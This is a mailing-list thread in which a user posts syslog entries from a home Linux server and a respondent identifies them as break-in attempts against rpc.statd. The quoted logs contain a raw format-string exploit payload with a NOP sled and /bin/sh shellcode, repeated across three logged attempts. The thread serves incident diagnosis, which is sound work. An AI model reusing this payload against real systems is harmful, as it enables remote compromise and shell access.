Yes, they are likely breakin attempts. Why in the *world* are you running
rpc.statd (or portmap, or...nevermind...some people can't be helped) on a
publicly accessable machine. That's flat out stupid.
Ken Seefried, CISSP
Christian Jaeger writes:
> Hello,
>
> I run a pc with potato on a cable modem line. Recently I discovered the
> following in /var/log/messages:
>
> Jun 10 20:21:16 pflanze -- MARK --
> Jun 10 20:33:55 pflanze
> Jun 10 20:33:55 pflanze /sbin/rpc.statd[229]: gethostbyname error for
> ^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n
> %137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\
> Jun 10 20:33:55 pflanze
> Ç^F/binÇF^D/shA0À\210F^G\211v^L\215V^P\215N^L\211ó°^KÍ\200°^AÍ\200è\177ÿÿÿ
> Jun 10 21:01:16 pflanze -- MARK --
>
> Jun 11 13:41:16 pflanze -- MARK --
> Jun 11 13:47:10 pflanze
> Jun 11 13:47:10 pflanze /sbin/rpc.statd[229]: gethostbyname error for
> ^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n
> %137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\
> Jun 11 13:47:10 pflanze
> Ç^F/binÇF^D/shA0À\210F^G\211v^L\215V^P\215N^L\211ó°^KÍ\200°^AÍ\200è\177ÿÿÿ
> Jun 11 14:01:16 pflanze -- MARK --
>
> Jun 12 09:01:16 pflanze -- MARK --
> Jun 12 09:09:47 pflanze
> Jun 12 09:09:47 pflanze /sbin/rpc.statd[229]: gethostbyname error for
> ^X÷ÿ¿^X÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%62716x%hn%51859x%hn\220\22
> 0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\
> 220\220\220\220\220\220\220\220\220\220\220\220\220
> Jun 12 09:09:47 pflanze
> Ç^F/binÇF^D/shA0À\210F^G\211v^L\215V^P\215N^L\211ó°^KÍ\200°^AÍ\200è\177ÿÿÿ
> Jun 12 09:21:16 pflanze -- MARK --
>
> Seems like a buffer overflow. (Is it happening in rpc.statd or in named or
> somewhere else?)
>
> I've now removed nfs-common && nfs-server. (BTW there's still running a
> daemon (portmap, from netbase) on the sunrpc port - I thought sunrpc is
> only (mainly?) for NFS?)
>
> After that I've installed ippl, which gives some interesting output as
> well:
>
> Jun 17 04:13:24 asp connection attempt from ACBDC962.ipt.aol.com
> [172.189.201.98]
> Jun 17 10:27:38 asp connection attempt from syr-66-66-4-173.twcny.rr.com
> [66.66.4.173]
> Jun 17 10:27:38 asp connection attempt from syr-66-66-4-173.twcny.rr.com
> [66.66.4.173]
>
> Jun 17 11:04:36 webcache connection attempt from
> ppp45-net1-idf2-bas1.isdnet.net [195.154.50.45]
>
> Jun 17 18:14:47 sunrpc connection attempt from
> h24-79-83-253.vc.shawcable.net [24.79.83.253]
> Jun 17 18:17:07 sunrpc connection attempt from skola8.zakladni-skola.cz
> [62.168.55.246]
>
> Jun 18 00:07:26 port 445 connection attempt from 62.2.179.7
> Jun 18 00:07:26 port 445 connection attempt from [62.2.179.7]
> Jun 18 00:07:27 port 445 connection attempt from [62.2.179.7]
>
> Now when I think about it these will probably all be harmless (maybe
> others on this cable modem subnet were serving stuff when they had my ip).
> If yes, please apologize my anxiety.
>
> .christian.
>
>
> -- To UNSUBSCRIBE, email to [EMAIL PROTECTED]
> with a subject of "unsubscribe". Trouble? Contact
> [EMAIL PROTECTED]
>
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
